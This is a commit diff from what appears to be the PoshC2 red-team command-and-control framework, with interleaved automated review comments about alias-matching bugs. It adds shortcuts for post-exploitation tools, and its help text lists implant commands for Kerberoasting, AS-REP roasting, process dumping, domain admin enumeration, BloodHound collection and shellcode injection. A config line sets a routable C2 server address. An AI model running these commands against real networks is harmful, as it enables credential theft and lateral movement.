Add aliases for common sharp commands
parent
56ed8c6ee1
commit
6fc1980a2d
13
Alias.py
13
Alias.py
|
@ -14,6 +14,15 @@ py_alias = [
|
|||
# C# Implant
|
||||
cs_alias = [
|
||||
["s","get-screenshot"],
|
||||
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
|
||||
["seatbelt", "run-exe Seatbelt.Program Seatbelt all"]
|
||||
]
|
||||
|
||||
# Parts of commands to replace if command starts with the key
|
||||
cs_replace = [
|
||||
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
|
||||
["sharpup", "run-exe SharpUp.Program SharpUp"],
|
||||
["seatbelt", "run-exe Seatbelt.Program Seatbelt"],
|
||||
["rubeus", "run-exe Rubeus.Program Rubeus"],
|
||||
["sharpview", "run-exe SharpView.Program SharpView"],
|
||||
["sharphound", "run-exe Sharphound2.Sharphound Sharphound"],
|
||||
["watson", "run-exe Watson.Program Watson"]
|
||||
]
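Review bot: The comment above `cs_replace` does not say that the keys must be lowercase, yet the handler hunk further down this page matches them against `command.lower().strip()`, so a key containing an upper-case letter would never match. I would extend the comment to `# Parts of commands to replace if the command starts with the key (keys must be lowercase; they are compared with the lowercased command)`. Two-element tuples or a dict would also state the key/expansion pairing more clearly than nested lists.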
|
||||
|
|
|
@ -132,4 +132,10 @@ def run_autoloads(command, randomuri, user):
|
|||
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)
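Review bot: The seven `run-exe …` checks each recompute `command.lower().strip()` and repeat the same call shape, so every further tool means another copy-pasted line that can drift out of step with the alias table in Alias.py. A prefix-to-module table iterated once keeps the pairs in one place and normalises the command a single time. The match also depends on exactly one space between `run-exe` and the type name, which is worth a comment. run_autoloads begins above this hunk, so the surrounding body is not visible here.

```python
# … unchanged: PowerShell module checks above …
    sharp_modules = (
        ("run-exe seatbelt", "Seatbelt.exe"),
        ("run-exe sharpup", "SharpUp.exe"),
        ("run-exe safetydump", "SafetyDump.exe"),
        ("run-exe rubeus", "Rubeus.exe"),
        ("run-exe sharpview", "SharpView.exe"),
        ("run-exe watson", "Watson.exe"),
        ("run-exe sharphound", "SharpHound.exe"),
    )
    normalised = command.lower().strip()
    for prefix, module in sharp_modules:
        if normalised.startswith(prefix):
            check_module_loaded(module, randomuri, user)
```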
|
||||
|
|
|
@ -7,7 +7,7 @@ PORT_NUMBER = 443 # This is the bind port
|
|||
|
||||
POSHDIR = "/opt/PoshC2_Python/"
|
||||
ROOTDIR = "/opt/PoshC2_Project/"
|
||||
HostnameIP = "https://192.168.233.1"
|
||||
HostnameIP = "https://193.36.15.234"
|
||||
DomainFrontHeader = "" # example df.azureedge.net
|
||||
DefaultSleep = "5s"
|
||||
Jitter = 0.20
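Review bot: The `HostnameIP` line changes between a private-range address and the routable `193.36.15.234`, which has nothing to do with adding aliases and looks like a local deployment setting committed by accident. The rendered page has lost its +/- markers, so which value is the new one is inferred from print order only. Whichever it is, an environment-specific address should not live in the tracked default config. I would revert this hunk and keep per-deployment values in an untracked override, with a comment such as `# placeholder - set per deployment, do not commit real addresses` on the default.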
|
||||
|
|
61
Help.py
61
Help.py
|
@ -69,7 +69,6 @@ help
|
|||
searchhelp listmodules
|
||||
label-implant <newlabel>
|
||||
back
|
||||
safetydump
|
||||
|
||||
Migration
|
||||
===========
|
||||
|
@ -87,49 +86,38 @@ stop-keystrokes
|
|||
testadcredential domain username password
|
||||
testlocalcredential username password
|
||||
cred-popper
|
||||
loadmodule SharpUp.exe
|
||||
run-exe SharpUp.Program SharpUp
|
||||
sharpup
|
||||
seatbelt all
|
||||
seatbelt BasicOSInfo
|
||||
seatbelt SysmonConfig
|
||||
seatbelt PowerShellSettings
|
||||
seatbelt RegistryAutoRuns
|
||||
watson
|
||||
|
||||
Privilege Escalation:
|
||||
=======================
|
||||
seatbelt
|
||||
loadmodule Seatbelt.exe
|
||||
run-exe Seatbelt.Program Seatbelt all
|
||||
run-exe Seatbelt.Program Seatbelt BasicOSInfo
|
||||
run-exe Seatbelt.Program Seatbelt SysmonConfig
|
||||
run-exe Seatbelt.Program Seatbelt PowerShellSettings
|
||||
run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
|
||||
|
||||
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
||||
=========================================================
|
||||
Process Dumping:
|
||||
================
|
||||
safetydump
|
||||
safetydump <pid>
|
||||
|
||||
Network Tasks / Lateral Movement:
|
||||
====================================
|
||||
loadmodule Rubeus.exe
|
||||
run-exe Rubeus.Program Rubeus kerberoast
|
||||
run-exe Rubeus.Program Rubeus asreproast /user:username
|
||||
|
||||
Network Tasks / Lateral Movement:
|
||||
====================================
|
||||
loadmodule SharpView.exe
|
||||
run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
|
||||
run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
||||
run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
||||
run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
||||
run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
|
||||
run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
||||
run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
||||
run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
|
||||
rubeus kerberoast
|
||||
rubeus asreproast /user:username
|
||||
sharpview Get-NetUser -SamAccountName ben
|
||||
sharpview Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
||||
sharpview Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
||||
sharpview Get-NetUser -Name deb -Domain blorebank.local
|
||||
sharpview Get-NetSession -Domain blorebank.local
|
||||
sharpview Get-DomainController -Domain blorebank.local
|
||||
sharpview Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
||||
sharpview Get-DomainUser -AdminCount -Properties samaccountname
|
||||
sharpview Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
||||
sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
||||
sharpview Find-InterestingDomainShareFile -ComputerName SERVER01
|
||||
|
||||
Bloodhound:
|
||||
=============
|
||||
loadmodule SharpHound.exe
|
||||
run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
||||
sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
||||
"""
|
||||
|
||||
posh_help1 = """
|
||||
|
@ -462,4 +450,5 @@ SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","mov
|
|||
"download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
|
||||
"testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
|
||||
"inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
|
||||
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt"]
|
||||
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt", "sharpup",
|
||||
"sharphound", "rubeus", "sharpview", "watson"]
|
||||
|
|
|
@ -25,8 +25,8 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
|
||||
# alias mapping
|
||||
for alias in ps_alias:
|
||||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
command.replace(alias[0], alias[1])
|
||||
|
||||
# opsec failures
|
||||
for opsec in ps_opsec:
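Review bot: `command.replace(alias[0], alias[1])` discards its result: Python strings are immutable, so `command` is unchanged after the loop and no alias is ever applied. This assumes the `startswith`/`replace` pair is the new side, since the rendered page has lost its +/- markers. The line should assign the result as the C# handler on this page does, `command = command.replace(alias[0], alias[1])`. The test also lowercases the command while `replace` is case-sensitive, so mixed-case input passes the check but would still not be rewritten. handle_ps_command starts and continues outside this hunk.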
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
import base64, re, traceback, os
|
||||
from Alias import cs_alias
|
||||
from Alias import cs_alias, cs_replace
|
||||
from Colours import Colours
|
||||
from Utils import randomuri, validate_sleep_time
|
||||
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
|
||||
from AutoLoads import check_module_loaded
|
||||
from AutoLoads import check_module_loaded, run_autoloads
|
||||
from Help import sharp_help1
|
||||
from Config import ModulesDirectory, POSHDIR
|
||||
from Core import readfile_with_completion
|
||||
|
@ -20,6 +20,13 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
|
||||
# alias replace
|
||||
for alias in cs_replace:
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
command = command.replace(alias[0], alias[1])
|
||||
|
||||
run_autoloads(command, randomuri, user)
|
||||
|
||||
if "searchhelp" in command.lower():
|
||||
searchterm = (command.lower()).replace("searchhelp ","")
|
||||
import string
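Review bot: The `# alias replace` loop tests `command.lower().strip().startswith(alias[0])` but then calls the case-sensitive `command.replace(alias[0], alias[1])`, which rewrites every occurrence of the key rather than only the leading one. Input typed as `Seatbelt all` passes the test and is left unexpanded, an argument that happens to contain the key text is rewritten as well, and a longer word that merely begins with a key also matches. Matching the first whitespace-separated token and substituting only that token avoids all three: `head, _, rest = command.strip().partition(" ")` followed by `if head.lower() == alias[0]: command = (alias[1] + " " + rest).rstrip()`. handle_sharp_command begins and continues outside this hunk.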
|
||||
|
|
|
@ -16,6 +16,8 @@ Add NotificationsProjectName in Config.py which is displayed in notifications me
|
|||
Add fpc script which searches the Posh DB for a particular command
|
||||
Use pyreadline for Windows compatibility
|
||||
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
|
||||
Add Windows install script
|
||||
Add aliases for common sharp modules
|
||||
|
||||
4.8 (13/02/19)
|
||||
==============
|
||||
|
|